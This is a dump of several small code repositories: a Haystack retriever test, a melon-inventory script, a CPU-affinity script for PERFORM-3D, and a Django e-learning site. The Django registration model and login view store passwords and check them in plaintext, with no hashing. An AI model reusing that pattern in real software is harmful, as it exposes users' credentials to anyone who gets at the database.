"text": "def test_tfidf_retriever():\n from haystack.retriever.sparse import TfidfRetriever\n\n test_docs = [\n {\"id\": \"26f84672c6d7aaeb8e2cd53e9c62d62d\", \"name\": \"testing the finder 1\", \"text\": \"godzilla says hello\"},\n {\"name\": \"testing the finder 2\", \"text\": \"optimus prime says bye\"},\n {\"name\": \"testing the finder 3\", \"text\": \"alien says arghh\"}\n ]\n\n from haystack.database.memory import InMemoryDocumentStore\n document_store = InMemoryDocumentStore()\n document_store.write_documents(test_docs)\n\n retriever = TfidfRetriever(document_store)\n retriever.fit()\n doc = retriever.retrieve(\"godzilla\", top_k=1)[0]\n assert doc.id == \"26f84672c6d7aaeb8e2cd53e9c62d62d\"\n assert doc.text == 'godzilla says hello'\n assert doc.meta == {\"name\": \"testing the finder 1\"}\n"
}
] | 24 |
laniludwick/melon-inventory-accounting | https://github.com/laniludwick/melon-inventory-accounting | 7f05399e934d2d4cb0ba5d2289e13dfd6f2f6186 | b397cedfbfa080b9303d85717ff2ec76a457dd9e | a492d6a9572e86a04a7087de1bb2a46c0667c543 | refs/heads/master | 2022-11-16T16:03:52.700675 | 2020-07-14T16:33:22 | 2020-07-14T16:33:22 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6879562139511108,
"alphanum_fraction": 0.6879562139511108,
"avg_line_length": 26.450000762939453,
"blob_id": "16bacd431085c3f7c0c74150b51790836e7fb9d4",
"content_id": "c2292dbfcafe5d5c7cf97d65c8b59f2303c37da7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 20,
"path": "/melon_info.py",
"repo_name": "laniludwick/melon-inventory-accounting",
"src_encoding": "UTF-8",
"text": "\"\"\"Print out all the melons in our inventory.\"\"\"\n\n\nfrom melons import melons #This call imports the dictionary in melons.py\n\n\ndef print_melons(melons):\n \"\"\"Print each melon with corresponding attribute information.\"\"\"\n\n for melon_name, melon_attributes in melons.items():\n\n print(\"\")\n print(f'{melon_name.upper()}') #Prints melon name\n\n for melon_attribute, melon_value in melon_attributes.items():\n\n print(f'{melon_attribute}: {melon_value}') #Prints melon attributes\n\n\nprint_melons(melons) #Call the function"
},
{
"alpha_fraction": 0.47339946031570435,
"alphanum_fraction": 0.49774572253227234,
"avg_line_length": 24.227272033691406,
"blob_id": "f53f5703ce35ac7b2bb67c58b5e1212aab0f8377",
"content_id": "f74cdefd51deb0533bc5ba88c0ef14a1024821d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1109,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 44,
"path": "/melons.py",
"repo_name": "laniludwick/melon-inventory-accounting",
"src_encoding": "UTF-8",
"text": "melons = {\n \n 'Honeydew' : {\n 'melon_price': 0.99,\n 'melon_seedlessness': 'Do not have',\n 'melon_flesh_color': 'Light pink',\n 'melon_rind_color': 'Light green',\n 'melon_average_weight': None,\n\n },\n\n 'Crenshaw' : {\n 'melon_price': 2.00,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Medium pink',\n 'melon_rind_color': 'Dark green',\n 'melon_average_weight': 1.47, \n },\n\n 'Crane' : {\n 'melon_price': 2.50,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Deep pink',\n 'melon_rind_color': 'Light green',\n 'melon_average_weight': 1.48, \n },\n\n 'Casaba' : {\n 'melon_price': 2.50,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Reddish',\n 'melon_rind_color': 'Dark green',\n 'melon_average_weight': 1.49, \n },\n\n 'Cantaloupe' : {\n 'melon_price': 0.99,\n 'melon_seedlessness': 'Have',\n 'melon_flesh_color': 'Orange',\n 'melon_rind_color': 'Beige',\n 'melon_average_weight': 1.50, \n }, \n\n}"
}
] | 2 |
LJYue/Set_affinity_for_Perform_3d | https://github.com/LJYue/Set_affinity_for_Perform_3d | 185f9a6477f863aab5595e87efedcaa7f8f0f0cc | 88e6c52727043f6d9c307a4ab8f855ad14741084 | ac364716b578c15d823601369af8e5c37e6a7eca | refs/heads/master | 2020-05-26T22:23:12.900413 | 2017-02-22T05:59:15 | 2017-02-22T05:59:15 | 82,510,156 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7732518911361694,
"alphanum_fraction": 0.787508487701416,
"avg_line_length": 104.21428680419922,
"blob_id": "99251e7dbe0d8bf6a6c88bd7f34e32725dadec82",
"content_id": "b32f9ba509aecef2c867cf800c9beda0aaada8a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1473,
"license_type": "no_license",
"max_line_length": 808,
"num_lines": 14,
"path": "/README.md",
"repo_name": "LJYue/Set_affinity_for_Perform_3d",
"src_encoding": "UTF-8",
"text": "# Readme\n## Link\nhttps://github.com/LJYue/Set_affinity_for_Perform_3d\n## Notice\nThis .py file set affinity to all threads for ALL PERFORM-3D engines every 20 minutes. This can be easily changed by modifying the file using any text editors, for instance, notepad.\n\nIt works only for 64 bit program; 32 bit is supported in thoeary. \n\n## Background\nPERFORM-3D would atomatically set affinity for all of its engines, which can be of benefit, but the program can only detect cores of the CPU instead of threads. Let me illustrate better. \n\nIf, for instance, the CPU has 2 cores (and 4 threads), the engines would be assgined to only two threads namely CPU0 and CPU2, leaving CPU1 and CPU3 idle. Since there are four threads, the computer can support four engines running in full capacity. One may want to set affinity for engines to all threads (CPU0, CPU1, CPU2 and CPU3 in this case) manually, so that the computer can run four engines simultaneously without jamming each other in only two of the four threads. But notice that an engine process is created for one load case only, after the completion of that load case, another engine process is created to run the folloiwing load case. Unfortunately, its affinity is automatically set to CPU0 and CPU2 by default. Now one would have to manually set affinity once again to reach full capacity! \n\nBeing fed up with, one turns to python and leaves such cumbersomeness to computer. Ha, isn't it what computers are created for?\n"
},
{
"alpha_fraction": 0.489393949508667,
"alphanum_fraction": 0.5015151500701904,
"avg_line_length": 26.54166603088379,
"blob_id": "cc19230fe16051d1c038e6d7b383d12388898e39",
"content_id": "21d734fe19e41caaf02ddd27f82b3e16612f901b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 24,
"path": "/run.py",
"repo_name": "LJYue/Set_affinity_for_Perform_3d",
"src_encoding": "UTF-8",
"text": "import sched\nimport time\nimport psutil\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n def set_affinity(sc): \n all_id = psutil.pids()\n for i in all_id:\n p = psutil.Process(i)\n if \"Pf3dEngine\" in p.name()or \"Perform-3D\" in p.name():\n # print p.pid\n # break\n p.cpu_affinity([])\n p.nice(psutil.HIGH_PRIORITY_CLASS)\n print str(p.pid)+\" set\"\n print time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n s.enter(600, 1, set_affinity, (s,))\n\n s.enter(1, 1, set_affinity, (s,))\n s.run()\n\nif __name__ == \"__main__\":\n main()"
}
] | 2 |
Shehab-Magdy/Ayrid_E-Learn-master | https://github.com/Shehab-Magdy/Ayrid_E-Learn-master | 6a747662d6aad9f6fd6634463efdbc55493a61f6 | 7dc6aac71b2026e8829d1e8b0540f6b1ae09e197 | 0cd765f3f433d00d6385640f732b57e818cd531f | refs/heads/master | 2022-04-15T17:32:28.517940 | 2020-04-11T21:50:19 | 2020-04-11T21:50:19 | 254,961,075 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.530393123626709,
"alphanum_fraction": 0.5413231253623962,
"avg_line_length": 45.5625,
"blob_id": "79e629c3b4375b0fcd57ddbdfcdf999476da43e1",
"content_id": "a6ea9b8cbcd1333729d7ac56e4bf235a2aef7c44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5215,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 112,
"path": "/eLearn/migrations/0001_initial.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.6 on 2019-12-28 11:06\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContactUS',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('firstName', models.CharField(max_length=60)),\n ('lastName', models.CharField(max_length=60)),\n ('email', models.EmailField(max_length=254)),\n ('message', models.TextField(null=True)),\n ('replyStatus', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Events',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=60)),\n ('startDate', models.DateTimeField(blank=True, null=True)),\n ('endDate', models.DateTimeField(blank=True, null=True)),\n ('location', models.CharField(max_length=60)),\n ('contactPhone', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('pic', models.FileField(upload_to='uploads/events/%Y/%m/%d/')),\n ('eventStatus', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='HaederSlider',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=60)),\n ('pic', models.FileField(upload_to='uploads/slider/%Y/%m/%d/')),\n ],\n ),\n migrations.CreateModel(\n name='Members',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('FullName', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('pic', models.FileField(upload_to='uploads/membersPhoto/%Y/%m/%d/')),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='ourTeam',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('FullName', models.CharField(max_length=60)),\n ('description', models.TextField(null=True)),\n ('JobTitle', models.CharField(max_length=60)),\n ('pic', models.FileField(upload_to='uploads/ourTeam/%Y/%m/%d/')),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='Registration',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=254)),\n ('password', models.CharField(max_length=60)),\n ('phoneNumber', models.CharField(max_length=30)),\n ('fullName', models.CharField(max_length=60)),\n ('birthDate', models.DateField(blank=True, null=True)),\n ('status', models.BooleanField(default=True)),\n ('activeUser', models.BooleanField(default=0)),\n ('Profilephoto', models.FileField(upload_to='uploads/regPhotos/%Y/%m/%d/')),\n ('creationDate', models.DateField(auto_now_add=True)),\n ('lastModifiedDate', models.DateField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='SiteSubscribers',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=254)),\n ('status', models.BooleanField(default=True)),\n ],\n ),\n migrations.CreateModel(\n name='SystemSettings',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('key', models.CharField(max_length=200)),\n ('value', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='EventDetails',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=60)),\n ('startTime', models.DateTimeField(blank=True, null=True)),\n ('endTime', models.DateTimeField(blank=True, null=True)),\n ('pic', models.FileField(upload_to='uploads/events/%Y/%m/%d/')),\n ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='eLearn.Events')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.81144779920578,
"alphanum_fraction": 0.8215488195419312,
"avg_line_length": 36.125,
"blob_id": "24e524263e97c6ebf57e026c4e959b02cfc0bc27",
"content_id": "5b40b4cbfe8a255066ce51f46047b6437f50cf7c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 297,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 8,
"path": "/eLearn/views/about_us.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef about(request):\n return render(request,'about_us/about.html')\n"
},
{
"alpha_fraction": 0.6871846914291382,
"alphanum_fraction": 0.6922300457954407,
"avg_line_length": 44.04545593261719,
"blob_id": "dfab0807c473e5f3f11d3aa67b275ff301bc0fcc",
"content_id": "090ca10d61dc5492619964ea241ee529417094c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 22,
"path": "/eLearn/views/contact_us.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\nfrom django.views.generic import View\nfrom eLearn.models import Registration, HaederSlider\nfrom eLearn.forms import ContactUsForm\n\ndef contactUs(request):\n if request.method == 'POST':\n form = ContactUsForm(request.POST)\n if form.is_valid():\n #send email code goes here\n sender_name = form.cleaned_data['firstName']\n sender_email = form.cleaned_data['email']\n message = \"{0} has sent you a message:\\n\\n{1}\".format(sender_name,form.cleaned_data['message'])\n send_mail('New enquiry',message, sender_email,['[email protected]'])\n return HttpResponse('Thanks for contacting us! ;)')\n else:\n form = ContactUsForm()\n return render(request,'contact_us/contactus.html', {'form': form})\n"
},
{
"alpha_fraction": 0.6881473064422607,
"alphanum_fraction": 0.6915995478630066,
"avg_line_length": 36.739131927490234,
"blob_id": "ad309847119c4fa9a3be54de14d8d852bdcf2330",
"content_id": "809a9fcd38e9261c58ae784fcd8a45b350c531cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 869,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 23,
"path": "/eLearn/views/members.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Members\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editMembers(request):\n if request.method == 'POST':\n newMember = Members()\n newMember.FullName = request.POST.get('FullName')\n newMember.description = request.POST.get('description')\n newMember.status = True if request.POST.get('active') else False\n newMember.pic = request.FILES['memberImg']\n newMember.save()\n return render(request, 'admin/adminhome.html')\n elif request.method == 'GET':\n pass\n if Members.objects.all():\n members = Members.objects.all()\n else:\n members=[]\n return render(request, 'admin/adminrotator/members.html', {'members':members})\n\n"
},
{
"alpha_fraction": 0.7396449446678162,
"alphanum_fraction": 0.7455621361732483,
"avg_line_length": 41.25,
"blob_id": "1d303e48c30ad05a94c4be38c25e5dc1e534ac04",
"content_id": "381611a8c1f58c646e31bcc745d2d705f1832f6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 8,
"path": "/eLearn/models/members.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass Members(models.Model):\n\t\"\"\"docstring for members, data of organizations cooperates with us.\"\"\"\n\tFullName = models.CharField(max_length = 60)\n\tdescription = models.TextField(null = True)\n\tpic = models.FileField(upload_to = 'uploads/membersPhoto/%Y/%m/%d/')\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.6972860097885132,
"alphanum_fraction": 0.7004175186157227,
"avg_line_length": 38.875,
"blob_id": "1a836b0ba0e7af2eb6d9bf3f6b930db8d2efabe5",
"content_id": "f6a40bfee8e0b0acb896b7aedfb3004c1a6c30e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 958,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 24,
"path": "/eLearn/views/team.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import ourTeam\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editTeamMember(request):\n if request.method == 'POST':\n newTeamMember = ourTeam()\n newTeamMember.FullName = request.POST.get('FullName')\n newTeamMember.JobTitle = request.POST.get('JobTitle')\n newTeamMember.description = request.POST.get('description')\n newTeamMember.status = True if request.POST.get('active') else False\n newTeamMember.pic = request.FILES['memberImg']\n newTeamMember.save()\n return render(request, 'admin/adminhome.html')\n elif request.method == 'GET':\n pass\n if ourTeam.objects.all():\n ourteam = ourTeam.objects.all()\n else:\n ourteam=[]\n return render(request, 'admin/adminrotator/ourteam.html', {'ourteam':ourteam})\n\n"
},
{
"alpha_fraction": 0.6967213153839111,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33.71428680419922,
"blob_id": "93d8229333cc65669b989b70bf8d41584611879c",
"content_id": "da4d958a07162c8de2915c220199291585122e97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 7,
"path": "/eLearn/models/haederSlider.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass HaederSlider(models.Model):\n \"\"\"docstring for haeder, images in the slider of the home page\"\"\"\n name = models.CharField(max_length=60)\n pic = models.FileField(upload_to='uploads/slider/%Y/%m/%d/')\n\n"
},
{
"alpha_fraction": 0.7471264600753784,
"alphanum_fraction": 0.7471264600753784,
"avg_line_length": 16.399999618530273,
"blob_id": "6067e07d67f11ff8163967404302e399cf5a3a08",
"content_id": "51f8236e004cab4ffb0004ffa2e6b9b938cb5dc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/eLearn/apps.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass ElearnConfig(AppConfig):\n name = 'eLearn'\n"
},
{
"alpha_fraction": 0.7194473743438721,
"alphanum_fraction": 0.7194473743438721,
"avg_line_length": 48.52631759643555,
"blob_id": "b6336ec12dd83b676b518f9ac40cf9e7c1e8b21f",
"content_id": "2fb572679045adbc3286ce5e1ab9382e12da3c74",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 19,
"path": "/eLearn/urls.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom .views import registration, home, admin, rotator, members, team, subscribers, contact_us, about_us\n\napp_name = 'eLearn'\n\nurlpatterns = [\n path('', home.index, name='elearn.home'),\n path('register/', registration.newRegistration, name='elearn.newRegistration'),\n path('login/', registration.login, name='elearn.login'),\n path('adminhome/', admin.home, name='elearn.admin'),\n path('admin/saverotator/', rotator.saveRotator, name='elearn.saverotator'),\n path('admin/members/', members.editMembers, name='elearn.members'),\n path('admin/ourTeam/', team.editTeamMember, name='elearn.ourTeam'),\n path('admin/subscribers/', subscribers.editSubscribers, name='elearn.subscribers'),\n path('contact-us/', contact_us.contactUs, name='elearn.contactUs'),\n path('about_us/', about_us.about, name='elearn.about'),\n]\n"
},
{
"alpha_fraction": 0.8294051885604858,
"alphanum_fraction": 0.8294051885604858,
"avg_line_length": 37.739131927490234,
"blob_id": "81e732701484e7cabcea2be284e730bfef11f2d4",
"content_id": "b770b9569980ff0dee243dd22169cdc1856276b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 891,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 23,
"path": "/eLearn/admin.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom .models import Registration, SystemSettings, SiteSubscribers, Events, EventDetails, ContactUS, HaederSlider, Members, ourTeam\n# from .models.registration import Registration\n# from .models.systemSettings import SystemSettings\n# from .models.siteSubscribers import SiteSubscribers\n# from .models.events import Events\n# from .models.eventDetails import EventDetails\n# from .models.contactUS import ContactUS\n# from .models.haederSlider import HaederSlider\n# from .models.members import Members\n# from .models.ourteam import ourTeam\n\nadmin.site.register(Registration)\nadmin.site.register(SystemSettings)\nadmin.site.register(SiteSubscribers)\nadmin.site.register(Events)\nadmin.site.register(EventDetails)\nadmin.site.register(ContactUS)\nadmin.site.register(HaederSlider)\nadmin.site.register(Members)\nadmin.site.register(ourTeam)\n"
},
{
"alpha_fraction": 0.8571428656578064,
"alphanum_fraction": 0.8571428656578064,
"avg_line_length": 42,
"blob_id": "df8fb020a938a4b740544becfa882b6ad9d00d0e",
"content_id": "6e51d4326967b0aa2ad91a08093a772ad422d8b6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 42,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 1,
"path": "/eLearn/forms/__init__.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from .contact_us_form import ContactUsForm"
},
{
"alpha_fraction": 0.6622428894042969,
"alphanum_fraction": 0.6642335653305054,
"avg_line_length": 37.64102554321289,
"blob_id": "3e647c6036b218ab6eb62a0e5a3319752c1cd69e",
"content_id": "661c96daa96a009ac30e4a8ec6a0e35bb2326a09",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1507,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 39,
"path": "/eLearn/views/registration.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef newRegistration(request):\n if request.method == 'GET':\n return render(request, 'registration/registration.html')\n elif request.method == 'POST':\n email = request.POST.get('email')\n password = request.POST.get('password')\n phoneno = request.POST.get('phone')\n fullname = request.POST.get('fullname')\n birthdate = request.POST.get('birthdate')\n profileimage = request.FILES['profileimage']\n newreg = Registration()\n newreg.email = email\n newreg.password = password\n newreg.phoneNumber = phoneno\n newreg.fullName = fullname\n newreg.birthDate = birthdate\n newreg.Profilephoto = profileimage\n newreg.save()\n return render(request, 'registration/login.html')\n\n\ndef login(request):\n if request.method == 'GET':\n return render(request, 'registration/login.html')\n elif request.method == 'POST':\n ema = request.POST.get('email')\n passw = request.POST.get('password')\n try:\n logedinUser = Registration.objects.get(email=ema , password=passw)\n return render(request, 'home/index.html')\n except Registration.DoesNotExist:\n return HttpResponse('Email or Password is incorrect')\n"
},
{
"alpha_fraction": 0.8120805621147156,
"alphanum_fraction": 0.8221476674079895,
"avg_line_length": 36.125,
"blob_id": "d70ca5dbd9e0af852caf299f77a0a475ae894789",
"content_id": "cc872dce409f62f96bbb512463d23210967536b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 298,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 8,
"path": "/eLearn/views/admin.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef home(request):\n return render(request,'admin/adminhome.html')\n\n"
},
{
"alpha_fraction": 0.8606811165809631,
"alphanum_fraction": 0.8606811165809631,
"avg_line_length": 34.88888931274414,
"blob_id": "179c091f8e543f4d905a455c5a9561de9dfd51c1",
"content_id": "6784747e2f0774bd498bbbb9a97ca85452e56ad4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 323,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 9,
"path": "/eLearn/models/__init__.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from .registration import Registration\nfrom .systemSettings import SystemSettings\nfrom .siteSubscribers import SiteSubscribers\nfrom .events import Events\nfrom .eventDetails import EventDetails\nfrom .contactUS import ContactUS\nfrom .haederSlider import HaederSlider\nfrom .members import Members\nfrom .ourteam import ourTeam\n"
},
{
"alpha_fraction": 0.7427937984466553,
"alphanum_fraction": 0.7472283840179443,
"avg_line_length": 44.099998474121094,
"blob_id": "013e27851deed3a35377d7b7c89777edeab4747c",
"content_id": "4b94f7844340628c046cf6806458edeeb43e1a68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 10,
"path": "/eLearn/models/eventDetails.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom .events import Events\n\nclass EventDetails(models.Model):\n\t\"\"\"docstring for EventDetails, descrip events details and program\"\"\"\n\tevent = models.ForeignKey(Events, on_delete = models.CASCADE)\n\ttitle = models.CharField(max_length = 60)\n\tstartTime = models.DateTimeField(null = True, blank = True)\n\tendTime = models.DateTimeField(null = True, blank = True)\n\tpic = models.FileField(upload_to = 'uploads/events/%Y/%m/%d/')\n"
},
{
"alpha_fraction": 0.6974359154701233,
"alphanum_fraction": 0.7076923251152039,
"avg_line_length": 35.5625,
"blob_id": "8c4988b3559b5ce0395b2d4b30efe384d06de88b",
"content_id": "c39cfbd5cdb3f9062069098e65dcb6e767c4f912",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 585,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 16,
"path": "/eLearn/models/events.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Events(models.Model):\n \"\"\"docstring for events, collecting events data\"\"\"\n name = models.CharField(max_length=60)\n startDate = models.DateTimeField(null=True, blank=True)\n endDate = models.DateTimeField(null=True, blank=True)\n location = models.CharField(max_length=60)\n contactPhone = models.CharField(max_length=60)\n description = models.TextField(null=True)\n pic = models.FileField(upload_to='uploads/events/%Y/%m/%d/')\n eventStatus = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.769911527633667,
"alphanum_fraction": 0.7831858396530151,
"avg_line_length": 36.66666793823242,
"blob_id": "ce8fcef32dc557b2a33171204491942be69edef7",
"content_id": "b52f3b7b8d3daba038305c76084f78212bfaf733",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 6,
"path": "/eLearn/models/siteSubscribers.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass SiteSubscribers(models.Model):\n\t\"\"\"docstring for SiteSubscribers, collecting subscribers emails\"\"\"\n\temail = models.EmailField(max_length = 254)\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.7247191071510315,
"alphanum_fraction": 0.7359550595283508,
"avg_line_length": 38.55555725097656,
"blob_id": "0de03f730f7fd82c10d36836167419521b25bc70",
"content_id": "c6e9a1017cbd27fb32458698aab7bd665affcf47",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 9,
"path": "/eLearn/models/ourteam.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass ourTeam(models.Model):\n\t\"\"\"docstring for ourTeam, Ayrid team members\"\"\"\n\tFullName = models.CharField(max_length = 60)\n\tdescription = models.TextField(null = True)\n\tJobTitle = models.CharField(max_length = 60)\n\tpic = models.FileField(upload_to = 'uploads/ourTeam/%Y/%m/%d/')\n\tstatus = models.BooleanField(default = True)\n"
},
{
"alpha_fraction": 0.6930052042007446,
"alphanum_fraction": 0.7163212299346924,
"avg_line_length": 37.599998474121094,
"blob_id": "985b8444c78f4a24a1c0df805e9a5e6ea6445f09",
"content_id": "4d1af5250f0165debc0c0ff8eeb3503b6f06fe46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 20,
"path": "/eLearn/models/registration.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
